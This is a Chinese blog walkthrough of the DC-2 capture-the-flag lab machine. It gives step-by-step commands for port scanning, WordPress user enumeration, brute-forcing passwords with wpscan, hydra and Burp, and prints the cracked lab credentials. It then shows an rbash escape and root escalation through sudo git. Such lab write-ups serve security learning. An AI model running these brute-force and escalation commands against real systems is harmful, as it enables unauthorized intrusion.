ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

dc2靶机--暴力破解篇

2021-01-16 17:57:03  阅读:470  来源: 互联网

标签:发现 暴力破解 -- jerry 提权 tom txt dc2


要准备一台kali
一台dc2的靶机 靶机下载地址:https

目录

一、信息收集

1.主机发现

nmap  -sn 192.168.77.0/24

在这里插入图片描述

2.端口扫描

 nmap -A -p- 192.168.77.133   (扫描全部端口)

在这里插入图片描述
发现开放了80(apache)端口和7744(ssh)端口

3.访问ip地址

发现访问失败
我在网上看到的教程需要把hosts解析文件给配置一下就可以了
Linux路径

vim/etc/hosts

windows路径

C:\Windows\System32\drivers\etc

在这里插入图片描述这次我们来进行访问一下,发现访问成功
成功跳转进来了
在这里插入图片描述搭眼一看发现是wordpress的cms,之前我们打过一个靶机就是这个的
我们再来研究研究
我们在页面上发现了flag的字样
我们进去看一下
在这里插入图片描述发现事情并不是想想的那么简单,但是我们翻译一下就发现简单许多了
看下面说的可以用cewl字典生成工具,这个就是可以将网站上的所有敏感的密码生成到一个文件里面
在这里插入图片描述

二、密码爆破

cewl http://dc-2/ -w ~/dc2.txt   //生成字典

在这里插入图片描述发现生成了好多敏感的密码

用户名枚举

wpscan --url http://dc-2 -e u

在这里插入图片描述发现枚举出来了三个
admin tom jerry
将这个三个用户名放到一个txt文档里面,方便到后面进行爆破
在这里插入图片描述

暴力破解

1.wpscan

wpscan --url http://dc-2  --passwords /dc2.txt  --usernames /dc2user.txt 

在这里插入图片描述

Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

发现爆出来了tom和jerry

2.hydra

使用hydra表单暴力破解(上一种方法就可以,我这里为了复习一下知识,所以都写上了)

这个情况我们就需要先抓包,进行分析他的表单,要找到后台的表单就需要先知道他的后台登录的目录,然后我们要结合(三)进行目录爆破
再使用这个hydra来做
在这里插入图片描述进行抓包
在这里插入图片描述我们也可以在bp种进行暴力破解

然后构造hydra的payload

hydra -L dc2user.txt  -P dc2.txt  dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

在这里插入图片描述说实话用九头蛇非常麻烦,不如用上一个wpscan

3.brup

使用bp进行暴力破解
在这里插入图片描述首先将抓的包发送到暴力破解模块
设置攻击为最后一个集束炸弹

在这里插入图片描述设置payload
在这里插入图片描述
在这里插入图片描述
然后进行爆破就可以了

三、目录爆破

只单单是这样还是不够的,我们需要进行爆破目录,因为我们现在还不知道他的后台,这样没法暴力破解他的密码

dirb http://dc-2   

在这里插入图片描述首先我们进入他的后台登录页面
使用我们刚才爆破出来的密码,进行登录
在这里插入图片描述
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
在这里插入图片描述我们使用jerry登录进去之后,点击flag2给的提示

这个提示说的不能用wordpress走捷径,所以我们只能利用之前的信息收集

发现了22端口也开放着,我们又知道了两个用户名和密码

登录一下试试

ssh -p 7744 tom@192.168.77.133

在经历了很多次的不明文密码的输入,终于登录成了
在这里插入图片描述进入终端命令行第一件事肯定要查看当前目录有什么,当我们进行cat的时候,发现了
他说没有这个命令,怎么可能呢,我去网上搜了一下,说的意思好像是有rbash的限制,我们要做的就是绕过rbash进行提权
在这里插入图片描述

四、提权

切换用户

查看文件,发现flag3,txt 执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

发现配置完成之后,可以直接进行执行命令

在这里插入图片描述我们在翻译一下内容是什么意思
在这里插入图片描述大概就是要切换到jerry用户
在这里插入图片描述发现切换成功
我们在进行查看一下目录里面有什么东西

在home目录下边的jerry的目录下边存在flag4.txt
在这里插入图片描述我们翻译过来看一下说的什么提示
在这里插入图片描述
大概是让我们提权的意思

以下是看的教程
查看jerry可以以root用户的身份执行git命令并且不需要密码
在这里插入图片描述

提权

两种方法

1、sudo git help config
在末行命令模式输入  !/bin/bash 或 !'sh' 完成提权
2、sudo git -p help
      !/bin/bash

我们这里用的第一种方法
在这里插入图片描述发现提权成功
在这里插入图片描述我们找找最后一个flag
在~目录下边
在这里插入图片描述完成~~~

标签:发现,暴力破解,--,jerry,提权,tom,txt,dc2
来源: https://blog.csdn.net/qq_46527080/article/details/112717914

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有